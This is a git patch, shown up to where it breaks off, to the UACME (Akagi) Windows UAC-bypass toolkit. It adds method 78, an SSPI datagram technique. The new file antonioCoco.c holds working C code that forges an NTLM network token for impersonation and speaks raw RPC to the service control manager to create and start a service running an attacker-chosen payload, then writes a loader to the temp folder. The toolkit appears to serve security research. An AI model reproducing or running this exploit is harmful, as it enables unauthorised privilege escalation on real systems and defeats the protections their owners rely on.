From 4c95fcfc201200ffff7365578188997c036a7a83 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Mon, 25 Sep 2023 20:49:06 +0700 Subject: [PATCH 1/4] v 3.6.5 Implement #146 Rtls update --- README.md | 15 +- Source/Akagi/Resource.rc | Bin 5554 -> 5552 bytes Source/Akagi/global.h | 9 +- Source/Akagi/methods/antonioCoco.c | 876 +++++++++++++++++++++++++++++ Source/Akagi/methods/azagarampur.c | 6 +- Source/Akagi/methods/methods.c | 15 +- Source/Akagi/methods/methods.h | 5 +- Source/Akagi/methods/routines.h | 8 +- Source/Akagi/sup.c | 84 ++- Source/Akagi/sup.h | 13 +- Source/Akagi/uacme.vcxproj | 1 + Source/Akagi/uacme.vcxproj.filters | 3 + Source/Akagi/uacme.vcxproj.user | 11 +- Source/Akatsuki/version.rc | Bin 4602 -> 4684 bytes Source/Fubuki/version.rc | Bin 4662 -> 4662 bytes Source/Shared/consts.h | 9 +- Source/Shared/ntos/ntbuilds.h | 10 +- Source/Shared/ntos/ntos.h | 361 +++++++++--- Source/Shared/util.c | 12 +- UACME.sha256 | 166 ------ 20 files changed, 1311 insertions(+), 293 deletions(-) create mode 100644 Source/Akagi/methods/antonioCoco.c delete mode 100644 UACME.sha256 diff --git a/README.md b/README.md index 8569380..ed39a36 100644 --- a/README.md +++ b/README.md @@ -793,13 +793,25 @@ First parameter is number of method to use, second is optional command (executab * Fixed in: unfixed :see_no_evil: * How: - * Code status: added in v3.6.4 +78. Author: antonioCoco + * Type: Impersonation + * Method: SSPI Datagram + * Target(s): Attacker defined + * Component(s): Attacker defined + * Implementation: ucmSspiDatagramMethod + * Works from: Windows 7 RTM (7600) + * AlwaysNotify compatible + * Fixed in: unfixed :see_no_evil: + * How: - + * Code status: added in v3.6.5 Note: * Method (30) (63) and later implemented only in x64 version; * Method (30) require x64 because it abuses WOW64 subsystem feature; -* Method (55) is not really reliable (as any GUI hacks) and included just for fun. +* Method (55) is not really reliable (as any GUI hacks) and included just for fun; +* Method (78) requires current user account password not to be blank. Run examples: * akagi32.exe 23 @@ -903,6 +915,7 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105 * MSDT DLL Hijack UAC bypass, https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass * UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944 * Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html +* Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html # Authors diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index 22ced16b85c6bb0ccbc30b992f8bf550f867bb79..232b26894ab257a2cf8bc544f45f3f93b12a4b1f 100644 GIT binary patch delta 89 zcmdm_y+M0J0XMfPgARicgE4~vgXQFEZe0}qUvA0GXSlyGPCmr@4k)1qS18D@yZ8kk N6PlR#W-h@MEC9Ox6j%TN delta 90 zcmdm>y-9mR0XMe^gARicgE4~vgVE$_Ze0}qUvA0GXSlyGPM*N8G5Hzq3817NT=7Q% S@y!?b#F&r;H-8k^&jJAWy%wAR diff --git a/Source/Akagi/global.h b/Source/Akagi/global.h index af19743..34549d8 100644 --- a/Source/Akagi/global.h +++ b/Source/Akagi/global.h @@ -4,9 +4,9 @@ * * TITLE: GLOBAL.H * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 04 Feb 2023 +* DATE: 22 Sep 2023 * * Common header file for the program support routines. * @@ -61,8 +61,13 @@ #include #include #include + +#define SECURITY_WIN32 +#include + #pragma comment(lib, "taskschd.lib") #pragma comment(lib, "rpcrt4.lib") +#pragma comment (lib, "Secur32.lib") #pragma warning(push) #pragma warning(disable: 4115) //named type definition in parentheses diff --git a/Source/Akagi/methods/antonioCoco.c b/Source/Akagi/methods/antonioCoco.c new file mode 100644 index 0000000..4c144e4 --- /dev/null +++ b/Source/Akagi/methods/antonioCoco.c @@ -0,0 +1,876 @@ +/******************************************************************************* +* +* (C) COPYRIGHT AUTHORS, 2023 +* +* TITLE: antonioCoco.C +* +* VERSION: 3.65 +* +* DATE: 22 Sep 2023 +* +* UAC bypass method from antonioCoco. +* +* https://github.com/antonioCoco/SspiUacBypass +* +* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF +* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED +* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A +* PARTICULAR PURPOSE. +* +*******************************************************************************/ +#include "global.h" + +#define MAX_MESSAGE_SIZE 12000 + +// rpc command ids +#define RPC_CMD_ID_OPEN_SC_MANAGERW 15 +#define RPC_CMD_ID_CREATE_SERVICEW 12 +#define RPC_CMD_ID_START_SERVICEW 19 +#define RPC_CMD_ID_DELETE_SERVICE 2 + +// rpc command output lengths +#define RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER 24 +#define RPC_OUTPUT_LENGTH_CREATE_SERVICE 28 +#define RPC_OUTPUT_LENGTH_START_SERVICE 4 +#define RPC_OUTPUT_LENGTH_DELETE_SERVICE 4 + +#define MAX_RPC_PACKET_LENGTH 4096 +#define MAX_PROCEDURE_DATA_LENGTH 2048 + +#define CALC_ALIGN_PADDING(VALUE_LENGTH, ALIGN_BYTES) ((((VALUE_LENGTH + ALIGN_BYTES - 1) / ALIGN_BYTES) * ALIGN_BYTES) - VALUE_LENGTH) + +// {8a885d04-1ceb-11c9-9fe8-08002b104860} (NDR) +#define RPC_NDR_UUID (RPC_WSTR)L"8a885d04-1ceb-11c9-9fe8-08002b104860" +#define SVCCTL_UUID (RPC_WSTR)L"367abb81-9844-35f1-ad32-98f038001003" + +typedef struct _RPC_BASE_HEADER { + WORD wVersion; + BYTE bPacketType; + BYTE bPacketFlags; + DWORD dwDataRepresentation; + WORD wFragLength; + WORD wAuthLength; + DWORD dwCallIndex; +} RPC_BASE_HEADER, * PRPC_BASE_HEADER; + +typedef struct _RPC_REQUEST_HEADER { + DWORD dwAllocHint; + WORD wContextID; + WORD wProcedureNumber; +} RPC_REQUEST_HEADER, * PRPC_REQUEST_HEADER; + +typedef struct _RPC_RESPONSE_HEADER { + DWORD dwAllocHint; + WORD wContextID; + BYTE bCancelCount; + BYTE bAlign[1]; +} RPC_RESPONSE_HEADER, * PRPC_RESPONSE_HEADER; + +typedef struct _RPC_BIND_REQUEST_CONTEXT_ENTRY { + WORD wContextID; + WORD wTransItemCount; + UUID InterfaceUUID; + DWORD dwInterfaceVersion; + UUID TransferSyntaxUUID; + DWORD dwTransferSyntaxVersion; +} RPC_BIND_REQUEST_CONTEXT_ENTRY, * PRPC_BIND_REQUEST_CONTEXT_ENTRY; + +typedef struct _RPC_BIND_REQUEST_HEADER { + WORD wMaxSendFrag; + WORD wMaxRecvFrag; + DWORD dwAssocGroup; + BYTE bContextCount; + BYTE bAlign[3]; + RPC_BIND_REQUEST_CONTEXT_ENTRY Context; +} RPC_BIND_REQUEST_HEADER, * PRPC_BIND_REQUEST_HEADER; + +typedef struct _RPC_BIND_RESPONSE_CONTEXT_ENTRY { + WORD wResult; + WORD wAlign; + BYTE bTransferSyntax[16]; + DWORD dwTransferSyntaxVersion; +} RPC_BIND_RESPONSE_CONTEXT_ENTRY, * PRPC_BIND_RESPONSE_CONTEXT_ENTRY; + +typedef struct _RPC_BIND_RESPONSE_HEADER1 { + WORD wMaxSendFrag; + WORD wMaxRecvFrag; + DWORD dwAssocGroup; +} RPC_BIND_RESPONSE_HEADER1, * PRPC_BIND_RESPONSE_HEADER1; + +typedef struct _RPC_BIND_RESPONSE_HEADER2 { + DWORD dwContextResultCount; + RPC_BIND_RESPONSE_CONTEXT_ENTRY Context; +} RPC_BIND_RESPONSE_HEADER2, * PRPC_BIND_RESPONSE_HEADER2; + +typedef struct _RPC_CONNECTION { + HANDLE hFile; + DWORD dwCallIndex; + DWORD dwInputError; + DWORD dwRequestInitialized; + BYTE bProcedureInputData[MAX_PROCEDURE_DATA_LENGTH]; + DWORD dwProcedureInputDataLength; + BYTE bProcedureOutputData[MAX_PROCEDURE_DATA_LENGTH]; + DWORD dwProcedureOutputDataLength; +} RPC_CONNECTION, * PRPC_CONNECTION; + +BOOL ucmxRpcBind( + _In_ PRPC_CONNECTION pRpcConnection, + _In_ RPC_WSTR pInterfaceUUID, + _In_ DWORD dwInterfaceVersion) +{ + RPC_BASE_HEADER RpcBaseHeader; + RPC_BIND_REQUEST_HEADER RpcBindRequestHeader; + DWORD dwBytesWritten = 0; + DWORD dwBytesRead = 0; + BYTE bResponseData[MAX_RPC_PACKET_LENGTH]; + RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL; + RPC_BIND_RESPONSE_HEADER1* pRpcBindResponseHeader1 = NULL; + RPC_BIND_RESPONSE_HEADER2* pRpcBindResponseHeader2 = NULL; + BYTE* pSecondaryAddrHeaderBlock = NULL; + WORD wSecondaryAddrLen = 0; + DWORD dwSecondaryAddrAlign = 0; + + // + // Set base header details. + // + RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader)); + RpcBaseHeader.wVersion = 5; + RpcBaseHeader.bPacketType = 11; + RpcBaseHeader.bPacketFlags = 3; + RpcBaseHeader.dwDataRepresentation = 0x10; + RpcBaseHeader.wFragLength = sizeof(RpcBaseHeader) + sizeof(RpcBindRequestHeader); + RpcBaseHeader.wAuthLength = 0; + RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex; + + // + // Set bind request header details. + // + RtlSecureZeroMemory(&RpcBindRequestHeader, sizeof(RpcBindRequestHeader)); + RpcBindRequestHeader.wMaxSendFrag = MAX_RPC_PACKET_LENGTH; + RpcBindRequestHeader.wMaxRecvFrag = MAX_RPC_PACKET_LENGTH; + RpcBindRequestHeader.dwAssocGroup = 0; + RpcBindRequestHeader.bContextCount = 1; + RpcBindRequestHeader.Context.wContextID = 0; + RpcBindRequestHeader.Context.wTransItemCount = 1; + RpcBindRequestHeader.Context.dwTransferSyntaxVersion = 2; + + if (RPC_S_OK != UuidFromString(pInterfaceUUID, &RpcBindRequestHeader.Context.InterfaceUUID)) + return FALSE; + + RpcBindRequestHeader.Context.dwInterfaceVersion = dwInterfaceVersion; + if (RPC_S_OK != UuidFromString(RPC_NDR_UUID, &RpcBindRequestHeader.Context.TransferSyntaxUUID)) + return FALSE; + + // + // Write base header. + // + if (!WriteFile(pRpcConnection->hFile, + &RpcBaseHeader, + sizeof(RpcBaseHeader), + &dwBytesWritten, + NULL)) + { + return FALSE; + } + + // + // Write bind request header. + // + if (!WriteFile(pRpcConnection->hFile, + &RpcBindRequestHeader, + sizeof(RpcBindRequestHeader), + &dwBytesWritten, + NULL)) + { + return FALSE; + } + + pRpcConnection->dwCallIndex++; + + // + // Get bind response. + // + RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData)); + if (!ReadFile(pRpcConnection->hFile, + bResponseData, + sizeof(bResponseData), + &dwBytesRead, + NULL)) + { + return FALSE; + } + + // + // Get a ptr to the base response header. + // + pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData; + + // + // Validate base response header. + // + if ((pRpcResponseBaseHeader->wVersion != 5) || + (pRpcResponseBaseHeader->bPacketType != 12) || + (pRpcResponseBaseHeader->bPacketFlags != 3) || + (pRpcResponseBaseHeader->wFragLength != dwBytesRead)) + { + return FALSE; + } + + // + // Get a ptr to the main bind response header body. + // + pRpcBindResponseHeader1 = (PRPC_BIND_RESPONSE_HEADER1)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER)); + + // + // Get secondary addr header ptr. + // + pSecondaryAddrHeaderBlock = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcBindResponseHeader1, sizeof(RPC_BIND_RESPONSE_HEADER1)); + wSecondaryAddrLen = *(WORD*)pSecondaryAddrHeaderBlock; + + // + // Validate secondary addr length. + // + if (wSecondaryAddrLen > 256) + return FALSE; + + // + // Calculate padding for secondary addr value if necessary. + // + dwSecondaryAddrAlign = CALC_ALIGN_PADDING((sizeof(WORD) + wSecondaryAddrLen), sizeof(ULONG)); + + // + // Get a ptr to the main bind response header body (after the variable-length secondary addr field). + // + pRpcBindResponseHeader2 = (PRPC_BIND_RESPONSE_HEADER2)RtlOffsetToPointer((BYTE*)pSecondaryAddrHeaderBlock, + sizeof(WORD) + wSecondaryAddrLen + dwSecondaryAddrAlign); + + // + // Validate context count. + // Ensure the result value for context #1 was successful. + // + if ((pRpcBindResponseHeader2->dwContextResultCount != 1) || + (pRpcBindResponseHeader2->Context.wResult != 0)) + { + return FALSE; + } + + return TRUE; +} + +BOOL ucmxRpcConnect( + _In_ LPCWSTR lpPipeName, + _In_ RPC_WSTR pInterfaceUUID, + _In_ DWORD dwInterfaceVersion, + _In_ PRPC_CONNECTION pRpcConnection) +{ + HANDLE hFile = NULL; + WCHAR szPipePath[MAX_PATH * 2]; + RPC_CONNECTION RpcConnection; + + // + // Set pipe path. + // + RtlSecureZeroMemory(szPipePath, sizeof(szPipePath)); + _strcpy(szPipePath, TEXT("\\\\127.0.0.1\\pipe\\")); + _strcat(szPipePath, lpPipeName); + + // + // Open rpc pipe. + // + hFile = CreateFile(szPipePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) + return FALSE; + + // + // Initialize rpc connection data. + // + RtlSecureZeroMemory(&RpcConnection, sizeof(RpcConnection)); + RpcConnection.hFile = hFile; + RpcConnection.dwCallIndex = 1; + + // + // Bind rpc connection. + // + if (!ucmxRpcBind(&RpcConnection, pInterfaceUUID, dwInterfaceVersion)) + return FALSE; + + // + // Store connection data. + // + RtlCopyMemory(pRpcConnection, &RpcConnection, sizeof(RpcConnection)); + + return TRUE; +} + +VOID ucmxRpcInitializeRequestData( + _In_ PRPC_CONNECTION pRpcConnection) +{ + // + // Initialize request data. + // + RtlSecureZeroMemory(pRpcConnection->bProcedureInputData, sizeof(pRpcConnection->bProcedureInputData)); + pRpcConnection->dwProcedureInputDataLength = 0; + RtlSecureZeroMemory(pRpcConnection->bProcedureOutputData, sizeof(pRpcConnection->bProcedureOutputData)); + pRpcConnection->dwProcedureOutputDataLength = 0; + + // + // Reset input error flag. + // + pRpcConnection->dwInputError = 0; + + pRpcConnection->dwRequestInitialized = 1; +} + +BOOL ucmxRpcSendRequest( + _In_ PRPC_CONNECTION pRpcConnection, + _In_ DWORD dwProcedureNumber) +{ + RPC_BASE_HEADER RpcBaseHeader; + RPC_REQUEST_HEADER RpcRequestHeader; + DWORD dwBytesWritten = 0; + BYTE bResponseData[MAX_RPC_PACKET_LENGTH]; + RPC_BASE_HEADER* pRpcResponseBaseHeader = NULL; + RPC_RESPONSE_HEADER* pRpcResponseHeader = NULL; + DWORD dwProcedureResponseDataLength = 0; + DWORD dwBytesRead = 0; + BYTE* pTempProcedureResponseDataPtr = NULL; + + // + // Ensure rpc request has been initialized. + // + if (pRpcConnection->dwRequestInitialized == 0) + return FALSE; + + // + // Clear initialised flag. + // + pRpcConnection->dwRequestInitialized = 0; + + // + // Check for input errors. + // + if (pRpcConnection->dwInputError != 0) + return FALSE; + + // + // Set base header details. + // + RtlSecureZeroMemory(&RpcBaseHeader, sizeof(RpcBaseHeader)); + RpcBaseHeader.wVersion = 5; + RpcBaseHeader.bPacketType = 0; + RpcBaseHeader.bPacketFlags = 3; + RpcBaseHeader.dwDataRepresentation = 0x10; + RpcBaseHeader.wFragLength = (WORD)(sizeof(RPC_BASE_HEADER) + sizeof(RPC_REQUEST_HEADER) + pRpcConnection->dwProcedureInputDataLength); + RpcBaseHeader.wAuthLength = 0; + RpcBaseHeader.dwCallIndex = pRpcConnection->dwCallIndex; + + // + // Set request header details. + // + RtlSecureZeroMemory(&RpcRequestHeader, sizeof(RpcRequestHeader)); + RpcRequestHeader.dwAllocHint = 0; + RpcRequestHeader.wContextID = 0; + RpcRequestHeader.wProcedureNumber = (WORD)dwProcedureNumber; + + // + // Write base header. + // + if (!WriteFile(pRpcConnection->hFile, + &RpcBaseHeader, + sizeof(RpcBaseHeader), + &dwBytesWritten, NULL)) + { + return FALSE; + } + + // + // Write request header. + // + if (!WriteFile(pRpcConnection->hFile, + &RpcRequestHeader, + sizeof(RpcRequestHeader), + &dwBytesWritten, + NULL)) + { + return FALSE; + } + + // + // Write request body. + // + if (!WriteFile(pRpcConnection->hFile, + pRpcConnection->bProcedureInputData, + pRpcConnection->dwProcedureInputDataLength, + &dwBytesWritten, + NULL)) + { + return FALSE; + } + + // + // Increase call index. + // + pRpcConnection->dwCallIndex++; + + // + // Get bind response. + // + RtlSecureZeroMemory(&bResponseData, sizeof(bResponseData)); + if (!ReadFile(pRpcConnection->hFile, + bResponseData, + sizeof(bResponseData), + &dwBytesRead, + NULL)) + { + return FALSE; + } + + // + // Get a ptr to the base response header. + // + pRpcResponseBaseHeader = (PRPC_BASE_HEADER)bResponseData; + + // + // Validate base response header. + // + if ((pRpcResponseBaseHeader->wVersion != 5) || + (pRpcResponseBaseHeader->bPacketType != 2) || + (pRpcResponseBaseHeader->bPacketFlags != 3) || + (pRpcResponseBaseHeader->wFragLength != dwBytesRead)) + { + return FALSE; + } + + // + // Get a ptr to the main response header body. + // + pRpcResponseHeader = (RPC_RESPONSE_HEADER*)RtlOffsetToPointer((BYTE*)pRpcResponseBaseHeader, sizeof(RPC_BASE_HEADER)); + + // + // Context ID must be 0. + // + if (pRpcResponseHeader->wContextID != 0) + return FALSE; + + // + // Calculate command response data length. + // + dwProcedureResponseDataLength = pRpcResponseBaseHeader->wFragLength - sizeof(RPC_BASE_HEADER) - sizeof(RPC_RESPONSE_HEADER); + + // + // Store response data. + // + if (dwProcedureResponseDataLength > sizeof(pRpcConnection->bProcedureOutputData)) + return FALSE; + + pTempProcedureResponseDataPtr = (BYTE*)RtlOffsetToPointer((BYTE*)pRpcResponseHeader, sizeof(RPC_RESPONSE_HEADER)); + RtlCopyMemory(pRpcConnection->bProcedureOutputData, pTempProcedureResponseDataPtr, dwProcedureResponseDataLength); + + // + // Store response data length. + // + pRpcConnection->dwProcedureOutputDataLength = dwProcedureResponseDataLength; + + return TRUE; +} + +BOOL ucmxRpcAppendRequestData_Binary( + _In_ PRPC_CONNECTION RpcConnection, + _In_ BYTE* Data, + _In_ DWORD DataLength, + _In_ BOOL IsUnicode) +{ + DWORD dwBytesAvailable = 0; + DWORD dwDataLength = DataLength; + + if (IsUnicode) + dwDataLength *= sizeof(WCHAR); + + // + // Ensure the request has been initialized. + // + if (RpcConnection->dwRequestInitialized == 0) + return FALSE; + + // + // Calculate number of bytes remaining in the input buffer. + // + dwBytesAvailable = sizeof(RpcConnection->bProcedureInputData) - RpcConnection->dwProcedureInputDataLength; + if (dwDataLength > dwBytesAvailable) + { + // + // Set input error flag. + // + RpcConnection->dwInputError = 1; + return FALSE; + } + + // + // Store data in buffer. + // + RtlCopyMemory(&RpcConnection->bProcedureInputData[RpcConnection->dwProcedureInputDataLength], Data, dwDataLength); + RpcConnection->dwProcedureInputDataLength += dwDataLength; + RpcConnection->dwProcedureInputDataLength += CALC_ALIGN_PADDING(dwDataLength, sizeof(ULONG)); + + return TRUE; +} + +BOOL ucmxRpcAppendRequestData_Dword( + _In_ PRPC_CONNECTION pRpcConnection, + _In_ DWORD dwValue) +{ + return ucmxRpcAppendRequestData_Binary( + pRpcConnection, + (BYTE*)&dwValue, + sizeof(DWORD), + FALSE); +} + +BOOL ucmxInvokeCreateSvcRpcMain( + _In_ LPWSTR lpszPayload) +{ + BOOL bResult = FALSE; + RPC_CONNECTION RpcConnection; + BYTE bServiceManagerObject[20]; + BYTE bServiceObject[20]; + DWORD dwReturnValue = 0; + DWORD dwServiceNameLength = 0; + WCHAR szServiceName[32]; + DWORD dwServiceCommandLineLength = 0; + + RpcConnection.hFile = INVALID_HANDLE_VALUE; + + do { + + // + // Generate random name for service. + // + szServiceName[0] = 0; + supBinTextEncode(supGetTickCount64(), szServiceName); + + dwServiceNameLength = (DWORD)(_strlen(szServiceName) + 1); + dwServiceCommandLineLength = (DWORD)(_strlen(lpszPayload) + 1); + + if (!ucmxRpcConnect(TEXT("ntsvcs"), SVCCTL_UUID, 2, &RpcConnection)) + break; + + // + // OpenSCManager. + // + ucmxRpcInitializeRequestData(&RpcConnection); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, SC_MANAGER_ALL_ACCESS); + + if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_OPEN_SC_MANAGERW)) + break; + + if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_OPEN_SC_MANAGER) + break; + + dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[20]; + if (dwReturnValue != 0) + break; + + RtlCopyMemory(bServiceManagerObject, &RpcConnection.bProcedureOutputData[0], sizeof(bServiceManagerObject)); + + // + // CreateService RPC request. + // + ucmxRpcInitializeRequestData(&RpcConnection); + ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceManagerObject, sizeof(bServiceManagerObject), FALSE); + ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceNameLength); + ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)szServiceName, dwServiceNameLength, TRUE); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ALL_ACCESS); + ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_WIN32_OWN_PROCESS); + ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_DEMAND_START); + ucmxRpcAppendRequestData_Dword(&RpcConnection, SERVICE_ERROR_IGNORE); + ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, dwServiceCommandLineLength); + ucmxRpcAppendRequestData_Binary(&RpcConnection, (BYTE*)lpszPayload, dwServiceCommandLineLength, TRUE); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + + if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_CREATE_SERVICEW)) + break; + + if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_CREATE_SERVICE) + break; + + dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[24]; + if (dwReturnValue != 0) + break; + + RtlCopyMemory(bServiceObject, &RpcConnection.bProcedureOutputData[4], sizeof(bServiceObject)); + + // + // StartService RPC request. + // + ucmxRpcInitializeRequestData(&RpcConnection); + ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + ucmxRpcAppendRequestData_Dword(&RpcConnection, 0); + + if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_START_SERVICEW)) + break; + + if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_START_SERVICE) + break; + + dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0]; + if (dwReturnValue != 0 && dwReturnValue != ERROR_SERVICE_REQUEST_TIMEOUT) + break; + + // + // DeleteService RPC request. + // + ucmxRpcInitializeRequestData(&RpcConnection); + ucmxRpcAppendRequestData_Binary(&RpcConnection, bServiceObject, sizeof(bServiceObject), FALSE); + + if (!ucmxRpcSendRequest(&RpcConnection, RPC_CMD_ID_DELETE_SERVICE)) + break; + + if (RpcConnection.dwProcedureOutputDataLength != RPC_OUTPUT_LENGTH_DELETE_SERVICE) + break; + + dwReturnValue = *(DWORD*)&RpcConnection.bProcedureOutputData[0]; + if (dwReturnValue != 0) + break; + + bResult = TRUE; + + } while (FALSE); + + if (RpcConnection.hFile != INVALID_HANDLE_VALUE) + CloseHandle(RpcConnection.hFile); + + return bResult; +} + +SECURITY_STATUS ucmxForgeNetworkAuthToken( + _Out_ PHANDLE TokenHandle +) { + + CredHandle hCredClient, hCredServer; + TimeStamp lifetimeClient, lifetimeServer; + SecBufferDesc negotiateDesc, challengeDesc, authenticateDesc; + SecBuffer negotiateBuffer, challengeBuffer, authenticateBuffer; + CtxtHandle clientContextHandle, serverContextHandle; + ULONG clientContextAttributes, serverContextAttributes; + SECURITY_STATUS secStatus; + HANDLE hTokenNetwork = NULL; + + *TokenHandle = NULL; + serverContextHandle.dwLower = 0; + serverContextHandle.dwUpper = 0; + clientContextHandle.dwLower = 0; + clientContextHandle.dwUpper = 0; + hCredServer.dwLower = 0; + hCredServer.dwUpper = 0; + + RtlSecureZeroMemory(&negotiateBuffer, sizeof(negotiateBuffer)); + RtlSecureZeroMemory(&challengeBuffer, sizeof(challengeBuffer)); + RtlSecureZeroMemory(&authenticateBuffer, sizeof(authenticateBuffer)); + + do { + + secStatus = AcquireCredentialsHandle(NULL, + (LPWSTR)NTLMSP_NAME, + SECPKG_CRED_OUTBOUND, + NULL, + NULL, + NULL, + NULL, + &hCredClient, + &lifetimeClient); + + if (!NT_SUCCESS(secStatus)) + break; + + secStatus = AcquireCredentialsHandle(NULL, + (LPWSTR)NTLMSP_NAME, + SECPKG_CRED_INBOUND, + NULL, + NULL, + NULL, + NULL, + &hCredServer, + &lifetimeServer); + + if (!NT_SUCCESS(secStatus)) + break; + + negotiateDesc.ulVersion = 0; + negotiateDesc.cBuffers = 1; + negotiateDesc.pBuffers = &negotiateBuffer; + negotiateBuffer.cbBuffer = MAX_MESSAGE_SIZE; + negotiateBuffer.BufferType = SECBUFFER_TOKEN; + negotiateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE); + + secStatus = InitializeSecurityContext(&hCredClient, + NULL, + NULL, + ISC_REQ_DATAGRAM, + 0, + SECURITY_NATIVE_DREP, + NULL, + 0, + &clientContextHandle, + &negotiateDesc, + &clientContextAttributes, + &lifetimeClient); + + if (!NT_SUCCESS(secStatus)) + break; + + challengeDesc.ulVersion = 0; + challengeDesc.cBuffers = 1; + challengeDesc.pBuffers = &challengeBuffer; + challengeBuffer.cbBuffer = MAX_MESSAGE_SIZE; + challengeBuffer.BufferType = SECBUFFER_TOKEN; + challengeBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE); + + secStatus = AcceptSecurityContext(&hCredServer, + NULL, + &negotiateDesc, + ASC_REQ_DATAGRAM, + SECURITY_NATIVE_DREP, + &serverContextHandle, + &challengeDesc, + &serverContextAttributes, + &lifetimeServer); + + if (!NT_SUCCESS(secStatus)) + break; + + authenticateDesc.ulVersion = 0; + authenticateDesc.cBuffers = 1; + authenticateDesc.pBuffers = &authenticateBuffer; + authenticateBuffer.cbBuffer = MAX_MESSAGE_SIZE; + authenticateBuffer.BufferType = SECBUFFER_TOKEN; + authenticateBuffer.pvBuffer = supHeapAlloc(MAX_MESSAGE_SIZE); + + secStatus = InitializeSecurityContext(NULL, + &clientContextHandle, + NULL, + 0, + 0, + SECURITY_NATIVE_DREP, + &challengeDesc, + 0, + &clientContextHandle, + &authenticateDesc, + &clientContextAttributes, + &lifetimeClient); + + if (!NT_SUCCESS(secStatus)) + break; + + secStatus = AcceptSecurityContext(NULL, + &serverContextHandle, + &authenticateDesc, + 0, + SECURITY_NATIVE_DREP, + &serverContextHandle, + NULL, + &serverContextAttributes, + &lifetimeServer); + + if (!NT_SUCCESS(secStatus)) + break; + + secStatus = QuerySecurityContextToken(&serverContextHandle, &hTokenNetwork); + + } while (FALSE); + + if (negotiateBuffer.pvBuffer) + supHeapFree(negotiateBuffer.pvBuffer); + if (challengeBuffer.pvBuffer) + supHeapFree(challengeBuffer.pvBuffer); + if (authenticateBuffer.pvBuffer) + supHeapFree(authenticateBuffer.pvBuffer); + + FreeCredentialsHandle(&hCredClient); + FreeCredentialsHandle(&hCredServer); + + DeleteSecurityContext(&clientContextHandle); + DeleteSecurityContext(&serverContextHandle); + + *TokenHandle = hTokenNetwork; + return secStatus; +} + +/* +* ucmSspiDatagramMethod +* +* Purpose: +* +* Bypass UAC using SSPI datagram context. +* +*/ +NTSTATUS ucmSspiDatagramMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize +) +{ + BOOL bNeedCleanup = FALSE; + NTSTATUS MethodResult = STATUS_ACCESS_DENIED; + HANDLE hToken = NULL; + WCHAR szLoaderFileName[MAX_PATH * 2]; + + do { + + // + // Forge token for impersonation. + // + if (!NT_SUCCESS(ucmxForgeNetworkAuthToken(&hToken))) + break; + + // + // Write loader to the %temp% + // + if (!supReplaceDllEntryPoint( + ProxyDll, + ProxyDllSize, + AKATSUKI_ENTRYPOINT_EXE, + TRUE)) + { + break; + } + + RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName)); + _strcpy(szLoaderFileName, g_ctx->szTempDirectory); + _strcat(szLoaderFileName, THEOLDNEWTHING); + 